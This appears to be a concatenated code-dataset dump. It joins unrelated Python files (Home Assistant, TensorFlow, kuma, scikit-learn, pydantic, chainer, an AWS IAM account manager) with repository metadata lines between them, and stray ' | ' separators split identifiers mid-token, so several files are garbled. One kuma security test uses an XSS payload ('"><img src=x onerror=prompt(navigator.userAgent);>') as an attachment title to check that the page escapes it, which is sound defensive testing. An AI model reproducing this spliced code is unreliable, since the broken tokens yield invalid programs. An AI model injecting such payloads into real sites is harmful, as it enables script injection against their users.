self.hass.block_till_done()
assert len(aioclient_mock.mock_calls) == 1
def test_rest_command_form_data(self, aioclient_mock):
"""Call a rest command with post form data."""
data = {
'payload': 'test'
}
self.config[rc.DOMAIN]['post_test'].update(data)
with assert_setup_component(4):
setup_component(self.hass, rc.DOMAIN, self.config)
aioclient_mock.post(self.url, content=b'success')
self.hass.services.call(rc.DOMAIN, 'post_test', {})
self.hass.block_till_done()
assert len(aioclient_mock.mock_calls) == 1
assert aioclient_mock.mock_calls[0][2] == b'test'
def test_rest_command_get(self, aioclient_mock):
"""Call a rest command with get."""
with assert_setup_component(4):
setup_component(self.hass, rc.DOMAIN, self.config)
aioclient_mock.get(self.url, content=b'success')
self.hass.services.call(rc.DOMAIN, 'get_test', {})
self.hass.block_till_done()
assert len(aioclient_mock.mock_calls) == 1
def test_rest_command_delete(self, aioclient_mock):
"""Call a rest command with delete."""
with assert_setup_component(4):
setup_component(self.hass, rc.DOMAIN, self.config)
aioclient_mock.delete(self.url, content=b'success')
self.hass.services.call(rc.DOMAIN, 'delete_test', {})
self.hass.block_till_done()
assert len(aioclient_mock.mock_calls) == 1
def test_rest_command_post(self, aioclient_mock):
"""Call a rest command | with post."""
data = {
'payload': 'data',
}
self.config[rc.DOMAIN]['post_test'].update(data)
with assert_setup_component(4):
setup_component(self.has | s, rc.DOMAIN, self.config)
aioclient_mock.post(self.url, content=b'success')
self.hass.services.call(rc.DOMAIN, 'post_test', {})
self.hass.block_till_done()
assert len(aioclient_mock.mock_calls) == 1
assert aioclient_mock.mock_calls[0][2] == b'data'
def test_rest_command_put(self, aioclient_mock):
"""Call a rest command with put."""
data = {
'payload': 'data',
}
self.config[rc.DOMAIN]['put_test'].update(data)
with assert_setup_component(4):
setup_component(self.hass, rc.DOMAIN, self.config)
aioclient_mock.put(self.url, content=b'success')
self.hass.services.call(rc.DOMAIN, 'put_test', {})
self.hass.block_till_done()
assert len(aioclient_mock.mock_calls) == 1
assert aioclient_mock.mock_calls[0][2] == b'data'
def test_rest_command_headers(self, aioclient_mock):
"""Call a rest command with custom headers and content types."""
header_config_variations = {
rc.DOMAIN: {
'no_headers_test': {},
'content_type_test': {
'content_type': 'text/plain'
},
'headers_test': {
'headers': {
'Accept': 'application/json',
'User-Agent': 'Mozilla/5.0'
}
},
'headers_and_content_type_test': {
'headers': {
'Accept': 'application/json'
},
'content_type': 'text/plain'
},
'headers_and_content_type_override_test': {
'headers': {
'Accept': 'application/j |
gunan/tensorflow | tensorflow/python/data/kernel_tests/shuffle_test.py | Python | apache-2.0 | 13,444 | 0.006174 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tf.data.Dataset.shuffle()`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
from absl.testing import parameterized
import numpy as np
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import function
from tensorflow.python.framework import combinations
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class ShuffleTest(test_base.DatasetTestBase, parameterized.TestCase):
@combinations.generate(test_base.default_test_combinations())
def testBasic(self):
components = (
np.array([1, 2, 3, 4]), np.array([5, 6, 7, 8]),
np.array([9.0, 10.0, 11.0, 12.0])
)
def dataset_fn(count=5, buffer_size=None, seed=0):
repeat_dataset = (
dataset_ops.Dataset.from_tensor_slices(components).repeat(count))
if buffer_size:
shuffle_dataset = repeat_dataset.shuffle(buffer_size, seed)
self.assertEqual(
tuple([c.shape[1:] for c in components]),
dataset_ops.get_legacy_output_shapes(shuffle_dataset))
return shuffle_dataset
else:
return repeat_dataset
# First run without shuffling to collect the "ground truth".
get_next = self.getNext(dataset_fn())
unshuffled_elements = []
for _ in range(20):
unshuffled_elements.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# Assert that the shuffled dataset has the same elements as the
# "ground truth".
get_next = self.getNext(dataset_fn(buffer_size=100, seed=37))
shuffled_elements = []
for _ in range(20):
shuffled_elements.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertAllEqual(sorted(unshuffled_elements), sorted(shuffled_elements))
# Assert that shuffling twice with the same seeds gives the same sequence.
get_next = self.getNext(dataset_fn(buffer_size=100, seed=37))
reshuffled_elements_same_seed = []
for _ in range(20):
reshuffled_elements_same_seed.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertEqual(shuffled_elements, reshuffled_elements_same_seed)
# Assert that shuffling twice with a different seed gives a different
# permutation of the same elements.
get_next = self.getNext(dataset_fn(buffer_size=100, seed=137))
reshuffled_elements_different_seed = []
for _ in range(20):
reshuffled_elements_different_seed.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertNotEqual(shuffled_elements, reshuffled_elements_different_seed)
self.assertAllEqual(
sorted(shuffled_elements), sorted(reshuffled_elements_different_seed))
# Assert that the shuffled dataset has the same elements as the
# "ground truth" when the buffer size is smaller than the input
# dataset.
get_next = self.getNext(dataset_fn(buffer_size=2, seed=37))
reshuffled_elements_small_buffer = []
for _ in range(20):
reshuffled_elements_small_buffer.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertAllEqual(
sorted(unshuffled_elements), sorted(reshuffled_elements_small_buffer))
# Test the case of shuffling an empty dataset.
get_next = self.getNext(dataset_fn(count=0, buffer_size=100, seed=37))
with self.assertRai | ses(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(combinations.combine(tf_api_version=1, mode="graph"))
def testSeedZero(self):
"""Test for same behavior when the seed is a Python or Tensor zero | ."""
iterator = dataset_ops.make_one_shot_iterator(
dataset_ops.Dataset.range(10).shuffle(10, seed=0))
get_next = iterator.get_next()
elems = []
with self.cached_session() as sess:
for _ in range(10):
elems.append(sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
seed_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
iterator = dataset_ops.make_initializable_iterator(
dataset_ops.Dataset.range(10).shuffle(10, seed=seed_placeholder))
get_next = iterator.get_next()
with self.cached_session() as sess:
sess.run(iterator.initializer, feed_dict={seed_placeholder: 0})
for elem in elems:
self.assertEqual(elem, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
@combinations.generate(test_base.default_test_combinations())
def testDefaultArguments(self):
components = [0, 1, 2, 3, 4]
dataset = dataset_ops.Dataset.from_tensor_slices(components).shuffle(
5).repeat()
get_next = self.getNext(dataset)
counts = collections.defaultdict(lambda: 0)
for _ in range(10):
for _ in range(5):
counts[self.evaluate(get_next())] += 1
for i in range(5):
self.assertEqual(10, counts[i])
@combinations.generate(
combinations.times(
test_base.graph_only_combinations(),
combinations.combine(reshuffle=[True, False]),
combinations.combine(graph_seed=38, op_seed=None) +
combinations.combine(graph_seed=None, op_seed=42) +
combinations.combine(graph_seed=38, op_seed=42)))
def testShuffleSeed(self, reshuffle, graph_seed, op_seed):
results = []
for _ in range(2):
with ops.Graph().as_default() as g:
random_seed.set_random_seed(graph_seed)
dataset = dataset_ops.Dataset.range(10).shuffle(
10, seed=op_seed, reshuffle_each_iteration=reshuffle).repeat(3)
iterator = dataset_ops.make_one_shot_iterator(dataset)
next_element = iterator.get_next()
run_results = []
with self.session(graph=g) as sess:
for _ in range(30):
run_results.append(sess.run(next_element))
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_element)
results.append(run_results)
self.assertAllEqual(results[0], results[1])
# TODO(b/117581999): enable this test for eager-mode.
@combinations.generate(
combinations.times(
test_base.graph_only_combinations(),
combinations.combine(
reshuffle=[True, False], initializable=[True, False])))
def testMultipleIterators(self, reshuffle, initializable):
with ops.Graph().as_default() as g:
dataset = dataset_ops.Dataset.range(100).shuffle(
10, reshuffle_each_iteration=reshuffle).repeat(3)
if initializable:
iterators = [dataset_ops.make_initializable_iterator(dataset)
for _ in range(2)]
else:
iterators = [dataset_ops.make_one_shot_iterator(dataset)
fo |
mastizada/kuma | kuma/attachments/tests/test_templates.py | Python | mpl-2.0 | 2,137 | 0.001404 | from nose.plugins.attrib import attr
from nose.tools import eq_, ok_
from pyquery import PyQuery as pq
import constance.config
from django.conf import settings
from kuma.users.tests import UserTestCase
from kuma.wiki.tests import revision, WikiTestCase
from kuma.core.urlresolvers import reverse
from ..models import Attachment
from ..utils import make_test_file
class AttachmentTests(UserTestCase, WikiTestCase):
def setUp(self):
super(AttachmentTests, self).setUp()
self.old_allowed_types = constance.config.WIKI_ATTACHMENT_ALLOWED_TYPES
constance.config.WIKI_ATTACHMENT_ALLOWED_TYPES = 'text/plain'
def tearDown(self):
super(AttachmentTests, self).tearDown()
constance.config.WIKI_ATTACHMENT_ALLOWED_TYPES = self.old_allowed_types
@attr('security')
def test_xss_file_attachment_titl | e(self):
title = '"><img src=x onerror=prompt(navigator.userAgent);>'
# use view to create new attachment
file_for_uplo | ad = make_test_file()
post_data = {
'title': title,
'description': 'xss',
'comment': 'xss',
'file': file_for_upload,
}
self.client.login(username='admin', password='testpass')
resp = self.client.post(reverse('attachments.new_attachment'),
data=post_data)
eq_(302, resp.status_code)
# now stick it in/on a document
attachment = Attachment.objects.get(title=title)
rev = revision(content='<img src="%s" />' % attachment.get_file_url(),
save=True)
# view it and verify markup is escaped
response = self.client.get(reverse('wiki.edit_document', args=(rev.slug,),
locale=settings.WIKI_DEFAULT_LANGUAGE))
eq_(200, response.status_code)
doc = pq(response.content)
eq_('%s xss' % title,
doc('#page-attachments-table .attachment-name-cell').text())
ok_('><img src=x onerror=prompt(navigator.userAgent);>' in
doc('#page-attachments-table .attachment-name-cell').html())
|
eske/seq2seq | translate/utils.py | Python | apache-2.0 | 20,579 | 0.002478 | import os
import sys
import re
import numpy as np
import logging
import struct
import random
import math
import wave
import shutil
import collections
import functools
import operator
import heapq
from collections import namedtuple
from contextlib import contextmanager
# special vocabulary symbols
_BOS = '<S>'
_EOS = '</S>'
_UNK = '<UNK>'
_KEEP = '<KEEP>'
_DEL = '<DEL>'
_INS = '<INS>'
_SUB = '<SUB>'
_NONE = '<NONE>'
_START_VOCAB = [_BOS, _EOS, _UNK, _KEEP, _DEL, _INS, _SUB, _NONE]
BOS_ID = 0
EOS_ID = 1
UNK_ID = 2
KEEP_ID = 3
DEL_ID = 4
INS_ID = 5
SUB_ID = 6
NONE_ID = 7
class FinishedTrainingException(Exception):
def __init__(self):
debug('finished training')
class CheckpointException(Exception):
pass
class EvalException(Exception):
pass
@contextmanager
def open_files(names, mode='r'):
""" Safely open a list of files in a context manager.
Example:
>>> with open_files(['foo.txt', 'bar.csv']) as (f1, f2):
... pass
"""
files = []
try:
for name_ in names:
if name_ is None:
file_ = sys.stdin if 'r' in mode else sys.stdout
else:
file_ = open(name_, mode=mode)
files.appen | d(file_)
yield files
finally:
for file_ in files:
file_.close()
class AttrDict(dict):
"""
Dictionary whose keys can be accessed as attributes.
Example:
>>> d = AttrDict(x=1, y=2)
>>> d.x
1
>>> d.y = 3
"""
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self # dark magic
def __getattr__(self, item):
return self._ | _dict__.get(item)
def reverse_edits(source, edits, fix=True, strict=False):
if len(edits) == 1: # transform list of edits as a list of (op, word) tuples
edits = edits[0]
for i, edit in enumerate(edits):
if edit in (_KEEP, _DEL, _INS, _SUB):
edit = (edit, edit)
elif edit.startswith(_INS + '_'):
edit = (_INS, edit[len(_INS + '_'):])
elif edit.startswith(_SUB + '_'):
edit = (_SUB, edit[len(_SUB + '_'):])
else:
edit = (_INS, edit)
edits[i] = edit
else:
edits = zip(*edits)
src_words = source
target = []
consistent = True
i = 0
for op, word in edits:
if strict and not consistent:
break
if op in (_DEL, _KEEP, _SUB):
if i >= len(src_words):
consistent = False
continue
if op == _KEEP:
target.append(src_words[i])
elif op == _SUB:
target.append(word)
i += 1
else: # op is INS
target.append(word)
if fix:
target += src_words[i:]
return target
def initialize_vocabulary(vocabulary_path):
"""
Initialize vocabulary from file.
We assume the vocabulary is stored one-item-per-line, so a file:
dog
cat
will result in a vocabulary {'dog': 0, 'cat': 1}, and a reversed vocabulary ['dog', 'cat'].
:param vocabulary_path: path to the file containing the vocabulary.
:return:
the vocabulary (a dictionary mapping string to integers), and
the reversed vocabulary (a list, which reverses the vocabulary mapping).
"""
if os.path.exists(vocabulary_path):
rev_vocab = []
with open(vocabulary_path) as f:
rev_vocab.extend(f.readlines())
rev_vocab = [line.rstrip('\n') for line in rev_vocab]
vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])
return namedtuple('vocab', 'vocab reverse')(vocab, rev_vocab)
else:
raise ValueError("vocabulary file %s not found", vocabulary_path)
def sentence_to_token_ids(sentence, vocabulary, character_level=False):
"""
Convert a string to list of integers representing token-ids.
For example, a sentence "I have a dog" may become tokenized into
["I", "have", "a", "dog"] and with vocabulary {"I": 1, "have": 2,
"a": 4, "dog": 7"} this function will return [1, 2, 4, 7].
:param sentence: a string, the sentence to convert to token-ids
:param vocabulary: a dictionary mapping tokens to integers
:param character_level: treat sentence as a string of characters, and
not as a string of words
:return: a list of integers, the token-ids for the sentence.
"""
sentence = sentence.rstrip('\n') if character_level else sentence.split()
return [vocabulary.get(w, UNK_ID) for w in sentence]
def get_filenames(data_dir, model_dir, extensions, train_prefix, dev_prefix, vocab_prefix, name=None,
ref_ext=None, binary=None, decode=None, eval=None, align=None, **kwargs):
"""
Get a bunch of file prefixes and extensions, and output the list of filenames to be used
by the model.
:param data_dir: directory where all the the data is stored
:param extensions: list of file extensions, in the right order (last extension is always the target)
:param train_prefix: name of the training corpus (usually 'train')
:param dev_prefix: name of the dev corpus (usually 'dev')
:param vocab_prefix: prefix of the vocab files (usually 'vocab')
:param kwargs: optional contains an additional 'decode', 'eval' or 'align' parameter
:return: namedtuple containing the filenames
"""
train_path = os.path.join(data_dir, train_prefix)
dev_path = [os.path.join(data_dir, prefix) for prefix in dev_prefix]
train = ['{}.{}'.format(train_path, ext) for ext in extensions]
dev_extensions = list(extensions)
if ref_ext is not None and ref_ext != extensions[-1]:
dev_extensions.append(ref_ext)
dev = [['{}.{}'.format(path, ext) for ext in dev_extensions] for path in dev_path]
vocab_path = os.path.join(data_dir, vocab_prefix)
vocab_src = ['{}.{}'.format(vocab_path, ext) for ext in extensions]
data = 'data' if name is None else 'data_{}'.format(name)
vocab_path = os.path.join(model_dir, data, 'vocab')
vocab = ['{}.{}'.format(vocab_path, ext) for ext in extensions]
os.makedirs(os.path.dirname(vocab_path), exist_ok=True)
binary = binary or [False] * len(vocab)
for src, dest, binary_ in zip(vocab_src, vocab, binary):
if not binary_ and not os.path.exists(dest):
debug('copying vocab to {}'.format(dest))
shutil.copy(src, dest)
exts = list(extensions)
if decode is not None: # empty list means we decode from standard input
test = decode
exts.pop(-1)
elif eval is not None:
if ref_ext is not None:
exts[-1] = ref_ext
test = eval or dev_prefix[:1]
else:
test = align or dev_prefix[:1]
if len(test) == 1 and not (decode and os.path.exists(test[0])):
corpus_path = os.path.join(data_dir, test[0]) if not os.path.dirname(test[0]) else test[0]
test = ['{}.{}'.format(corpus_path, ext) for ext in exts]
filenames = namedtuple('filenames', ['train', 'dev', 'test', 'vocab'])
return filenames(train, dev, test, vocab)
def read_dataset(paths, extensions, vocabs, max_size=None, character_level=None, sort_by_length=False,
max_seq_len=None, from_position=None, binary=None):
data_set = []
if from_position is not None:
debug('reading from position: {}'.format(from_position))
line_reader = read_lines_from_position(paths, from_position=from_position, binary=binary)
character_level = character_level or {}
positions = None
for inputs, positions in line_reader:
if len(data_set) > 0 and len(data_set) % 100000 == 0:
debug(" lines read: {}".format(len(data_set)))
lines = [
input_ if binary_ else
sentence_to_token_ids(input_, vocab.vocab, character_level=character_level.get(ext))
for input_, vocab, binary_, ext in zip(inputs, vocabs, binary, extensions)
]
if not all(lines): # skip empty inputs
continue
# skip lines that are too long
if ma |
collective/collective.z3cform.bootstrap | collective/z3cform/bootstrap/utils.py | Python | gpl-3.0 | 407 | 0 | from zope.interface import alsoProvides
from collective.z3cform.bootstrap.interfaces import IBootstrapLayer
def set_bootstrap_layer(request):
"""Set the IBootstrapLayer on the request. Useful if you don't want to
enable the bootstrap layer for your w | hole site. | """
alsoProvides(request, IBootstrapLayer)
def before_traversal_event_handler(obj, event):
set_bootstrap_layer(event.request)
|
samuelcolvin/pydantic | docs/examples/settings_add_custom_source.py | Python | mit | 978 | 0 | import json
from pathlib import Path
from typing import Dict, Any
from pydantic import BaseSettings
def json_config_settings_source(settings: BaseSettings) -> Dict[str, Any]:
"""
A simple settings source that loads variables from a JSON file
at the project's root.
Here we happen to choose to use the `env_file_encoding` from Config
when reading `config.json`
"""
encoding = settings.__config__.env_file_encoding
return json.loads(Path('config.json').read_text(encoding))
class Se | ttings(BaseSettings):
foobar: str
class Config:
env_file_encoding = 'utf-8'
@classmethod
def customise_sources(
cls,
init_settings,
env_settings,
file_secret_settings,
):
return (
init_settings,
j | son_config_settings_source,
env_settings,
file_secret_settings,
)
print(Settings())
|
masia02/chainer | chainer/functions/clipped_relu.py | Python | mit | 1,841 | 0.002173 | from chainer import cuda
from chainer import function
from chainer import utils
from chainer.utils import type_check
import numpy
class ClippedReLU(function.Function):
"""Clipped Rectifier Unit function.
Clipped ReLU is written as :math:`ClippedReLU(x, z) = \min(\max(0, x), z)`,
where :math:`z(>0)` is a parameter to cap return value of ReLU.
"""
def __init__(self, z):
if not isinstance(z, float):
raise TypeError('z must be float value')
# z must be positive.
assert z > 0
self.cap = z
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 1)
x | _type, = in_types
type_check.expect(x_type.dtype == numpy.float32)
def forward_cpu(self, x):
return utils.force_array(numpy.minimum(
numpy.maximum(0, x[0]), self.cap)).astype(numpy.float32),
def backward_cpu(self, x, gy):
return utils.force_array(
gy[0] * (0 < x[0]) * (x[0] < self.cap)).astype(nump | y.float32),
def forward_gpu(self, x):
return cuda.elementwise(
'T x, T cap', 'T y', 'y = min(max(x, (T)0), cap)',
'clipped_relu_fwd')(x[0], self.cap),
def backward_gpu(self, x, gy):
gx = cuda.elementwise(
'T x, T gy, T z', 'T gx',
'gx = ((x > 0) and (x < z))? gy : 0',
'clipped_relu_bwd')(x[0], gy[0], self.cap)
return gx,
def clipped_relu(x, z=20.0):
"""Clipped Rectifier Unit function.
This function is expressed as :math:`ClippedReLU(x, z)
= \min(\max(0, x), z)`, where :math:`z(>0)` is a clipping value.
Args:
x (~chainer.Variable): Input variable.
z (float): Clipping value. (default = 20.0)
Returns:
~chainer.Variable: Output variable.
"""
return ClippedReLU(z)(x)
|
Fireblend/scikit-learn | sklearn/linear_model/base.py | Python | bsd-3-clause | 16,019 | 0.000499 | """
Generalized Linear models.
"""
# Author: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Fabian Pedregosa <fabian.pedregosa@inria.fr>
# Olivier Grisel <olivier.grisel@ensta.org>
# Vincent Michel <vincent.michel@inria.fr>
# Peter Prettenhofer <peter.prettenhofer@gmail.com>
# Mathieu Blondel <mathieu@mblondel.org>
# Lars Buitinck <L.J.Buitinck@uva.nl>
#
# License: BSD 3 clause
from __future__ import division
from abc import ABCMeta, abstractmethod
import numbers
import warnings
import numpy as np
import scipy.sparse as sp
from scipy import linalg
from scipy import sparse
from ..externals import six
from ..externals.joblib import Parallel, delayed
from ..base import BaseEstimator, ClassifierMixin, RegressorMixin
from ..utils import as_float_array, check_array, check_X_y, deprecated, column_or_1d
from ..utils.extmath import safe_sparse_dot
from ..utils.sparsefuncs import mean_variance_axis, inplace_column_scale
from ..utils.fixes import sparse_lsqr
from ..utils.validation import NotFittedError, check_is_fitted
###
### TODO: intercept for all models
### We should define a common function to center data instead of
### repeating the same code inside each fit method.
### TODO: bayesian_ridge_regression and bayesian_regression_ard
### should be squashed into its respective objects.
def sparse_center_data(X, y, fit_intercept, normalize=False):
"""
Compute information needed to center data to have mean zero along
axis 0. Be aware that X will not be centered since it would break
the sparsity, but will be normalized if asked so.
"""
if fit_intercept:
# we might require not to change the csr matrix sometimes
# store a copy if normalize is True.
# Change dtype to float64 since mean_variance_axis accepts
# it that way.
if sp.isspmatrix(X) and X.getformat() == 'csr':
X = sp.csr_matrix(X, copy=normalize, dtype=np.float64)
else:
X = sp.csc_matrix(X, copy=normalize, dtype=np.float64)
X_mean, X_var = mean_variance_axis(X, axis=0)
if normalize:
# transform variance to std in-place
# XXX: currently scaled to variance=n_samples to match center_data
X_var *= X.shape[0]
X_std = np.sqrt(X_var, X_var)
del X_var
X_std[X_std == 0] = 1
inplace_column_scale(X, 1. / X_std)
else:
X_std = np.ones(X.shape[1])
y_mean = y.mean(axis=0)
y = y - y_mean
else:
X_mean = np.zeros(X.shape[1])
X_std = np.ones(X.shape[1])
y_mean = 0. if y.ndim == 1 else np.zeros(y.shape[1], dtype=X.dtype)
return X, y, X_mean, y_mean, X_std
def center_data(X, y, fit_intercept, normalize=False, copy=True,
sample_weight=None):
"""
Centers data to have mean zero along axis 0. This is here because
nearly all linear models will want their data to be centered.
If sample_weight is not None, then the weighted mean of X and y
is zero, and not the mean itself
"""
X = as_float_array(X, copy)
if fit_intercept:
if isinstance(sample_weight, numbers.Number):
sample_weight = None
if sp.issparse(X):
X_mean = np.zeros(X.shape[1])
X_std = np.ones(X.shape[1])
else:
X_mean = np.average(X, axis=0, weights=sample_weight)
X -= X_mean
if normalize:
# XXX: currently scaled to variance=n_samples
X_std = np.sqrt(np.sum(X ** 2, axis=0))
X_std[X_std == 0] = 1
X /= X_std
else:
X_std = np.ones(X.shape[1])
y_mean = np.average(y, axis=0, weights=sample_weight)
y = y - y_mean
else:
X_mean = np.zeros(X.shape[1])
X_std = np.ones(X.shape[1])
y_mean = 0. if y.ndim == 1 else np.zeros(y.shape[1], dtype=X.dtype)
return X, y, X_mean, y_mean, X_std
def _rescale_data(X, y, sample_weight):
"""Rescale data so as to support sample_weight"""
n_samples = X.shape[0]
sample_weight = sample_weight * np.ones(n_samples)
sample_weight = np.sqrt(sample_weight)
sw_matrix = sparse.dia_matrix((sample_weight, 0),
shape=(n_samples, n_samples))
X = safe_sparse_dot(sw_matrix, X)
y = safe_sparse_dot(sw_matrix, y)
return X, y
class LinearModel(six.with_metaclass(ABCMeta, BaseEstimator)):
"""Base class for Linear Models"""
@abstractmethod
def fit(self, X, y):
"""Fit model."""
@deprecated(" and will be removed in 0.19.")
def decision_function(self, X):
"""Decision function of the linear model.
Parameters
----------
X : {array-like, sparse matrix}, shape = (n_samples, n_features)
Samples.
Returns
-------
C : array, shape = (n_samples,)
| Returns predicted values.
"""
return self._decision_function(X)
def _decision_function(self, X):
check_is_fitted(self, "coef_")
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
return safe_sparse_dot(X, self.coef_.T,
dense_output=True) + self.intercept_
def predict(self, X):
"""Predict using the linear model
Parameters
----------
X : {array-like, sparse matri | x}, shape = (n_samples, n_features)
Samples.
Returns
-------
C : array, shape = (n_samples,)
Returns predicted values.
"""
return self._decision_function(X)
_center_data = staticmethod(center_data)
def _set_intercept(self, X_mean, y_mean, X_std):
"""Set the intercept_
"""
if self.fit_intercept:
self.coef_ = self.coef_ / X_std
self.intercept_ = y_mean - np.dot(X_mean, self.coef_.T)
else:
self.intercept_ = 0.
# XXX Should this derive from LinearModel? It should be a mixin, not an ABC.
# Maybe the n_features checking can be moved to LinearModel.
class LinearClassifierMixin(ClassifierMixin):
"""Mixin for linear classifiers.
Handles prediction for sparse and dense X.
"""
def decision_function(self, X):
"""Predict confidence scores for samples.
The confidence score for a sample is the signed distance of that
sample to the hyperplane.
Parameters
----------
X : {array-like, sparse matrix}, shape = (n_samples, n_features)
Samples.
Returns
-------
array, shape=(n_samples,) if n_classes == 2 else (n_samples, n_classes)
Confidence scores per (sample, class) combination. In the binary
case, confidence score for self.classes_[1] where >0 means this
class would be predicted.
"""
if not hasattr(self, 'coef_') or self.coef_ is None:
raise NotFittedError("This %(name)s instance is not fitted "
"yet" % {'name': type(self).__name__})
X = check_array(X, accept_sparse='csr')
n_features = self.coef_.shape[1]
if X.shape[1] != n_features:
raise ValueError("X has %d features per sample; expecting %d"
% (X.shape[1], n_features))
scores = safe_sparse_dot(X, self.coef_.T,
dense_output=True) + self.intercept_
return scores.ravel() if scores.shape[1] == 1 else scores
def predict(self, X):
"""Predict class labels for samples in X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Samples.
Returns
-------
C : array, shape = [n_samples]
Predicted class label per sample.
"""
scores = self.decision_function(X)
if len(scores.shape) == 1:
indices = (scores > 0).astype(np.int)
else:
indices = scores.argmax(axis=1)
return self.classes_[indices]
def _predict_proba_ |
Demeterr/iam_acctmgr | iam_acctmgr.py | Python | apache-2.0 | 13,615 | 0.00022 | # Copyright 2015 Bebop Technologies
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'Integrate AWS IAM with the PAM, Name Service Switch, and SSH'
from __future__ import print_function
import argparse
import datetime
import json
import logging
import os
import pwd
import re
import spwd
import subprocess
import sys
import tempfile
import time
import traceback
import botocore.session
# Requires botocore>=1.0 but Jessie is on an ancient version
# https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=798015
LOG = logging.getLogger('iam_acctmgr')
EPOCH = datetime.datetime.utcfromtimestamp(0)
IAM_POLLING_INTERVAL = int(os.getenv('IAM_ACCTMGR_POLL_INTERVAL', 60))
MIN_USER_UID = int(os.getenv('IAM_ACCTMGR_MIN_USER_UID', 10000))
MAX_USER_UID = int(os.getenv('IAM_ACCTMGR_MAX_USER_UID', 19999))
IAM_PUB_KEY_FILE = '/etc/iam-pub-ssh-keys'
IAM_GROUP = os.getenv('IAM_ACCTMGR_GROUP')
EXTRAUSERS_PASSWD = '/var/lib/extrausers/passwd'
EXTRAUSERS_SHADOW = '/var/lib/extrausers/shadow'
SUDOERS_CONFIG = '/etc/sudoers.d/90-aws-iam-admin'
assert MAX_USER_UID > MIN_USER_UID
# UID Policies:
#
# Debian: https://www.debian.org/doc/manuals/system-administrator/ch-sysadmin-users.html
def is_iam_user(user):
'Is the UID of a ``pwd.struct_passwd`` within the range of IAM users?'
return user.pw_uid >= MIN_USER_UID and user.pw_uid <= MAX_USER_UID
def authorized_keys_command(username=None,
pub_keys_file=IAM_PUB_KEY_FILE,
out_fd=None):
'''Print the SSH public keys associated with a username.
This function reads from a file with a JSON payload generated from
``fetch_keys()``.
See AuthorizedKeysCommand section of the OpenSSH manual.
'''
username = username or sys.argv[1]
out_fd = out_fd or sys.stdout
with open(pub_keys_file) as keyfd:
keys = json.loads(keyfd.read())
for key in keys[username]:
print(key.strip(), file=out_fd)
def fetch_keys(group_name):
'''Fetch SSH keys associated with all *active* users of an IAM group.
This relies on a new SSH Public Key metadata feature recently added to AWS
IAM. Note that the AWS documentation currently only mentions this feature
in the context of their CodeCommit product but the API naming itself has no
such context. See:
https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetSSHPublicKey.html
https://docs.aws.amazon.com/IAM/latest/APIReference/API_ListSSHPublicKeys.html
:type group_name: str
:param group_name: The IAM group from which to create the extra users.
'''
session = botocore.session.get_session()
iam = session.create_client('iam')
try:
members = iam.get_group(GroupName='admin')
except:
LOG.error('Error trying to retrieve IAM group %s', group_name)
raise
result = {}
for user in members['Users']:
username = user['UserName']
result[username] = []
for key in iam.list_ssh_public_keys(UserName=username)['SSHPublicKeys']:
if 'Active' != key['Status']:
continue
ssh_pub = iam.get_ssh_public_key(
UserName=username,
SSHPublicKeyId=key['SSHPublicKeyId'],
Encoding='SSH')['SSHPublicKey']['SSHPublicKeyBody']
result[username].append(ssh_pub)
# Ensure stable ordering
result[username].sort()
return result
def filter_keys(user_pks, system_names):
'Filter out invalid user(name)s'
result = {}
# Only accept posix compliant usernames.
# https://serverfault.com/questions/73084/
name_regex = re.compile(r'^[_.A-Za-z0-9][-_.A-Za-z0-9]*$')
for username, pks in user_pks.items():
if name_regex.match(username) is None:
LOG.warning('Skipping invalid user name %s', username)
continue
if username in system_names:
LOG.warning('Skipping IAM user %s due to matching system user',
username)
continue
if len(pks) < 1:
LOG.warning('Skipping IAM user %s with no public keys',
username)
continue
result[username] = pks
return result
def passwd_to_line(struct):
'Map an instance of ``pwd.struct_passwd`` to a byte-string.'
return ':'.join(str(x) for x in struct).encode('utf-8')
def shadow_to_line(struct):
'Map an instance of ``spwd.struct_spwd`` to a byte-string.'
return ':'.join('' if isinstance(x, int) and x < 0 else str(x)
for x in struct).encode('utf-8')
def process(user_pks, pwall, spwall):
'''Generate the passwd, shadow, and sudo fragments for IAM users.
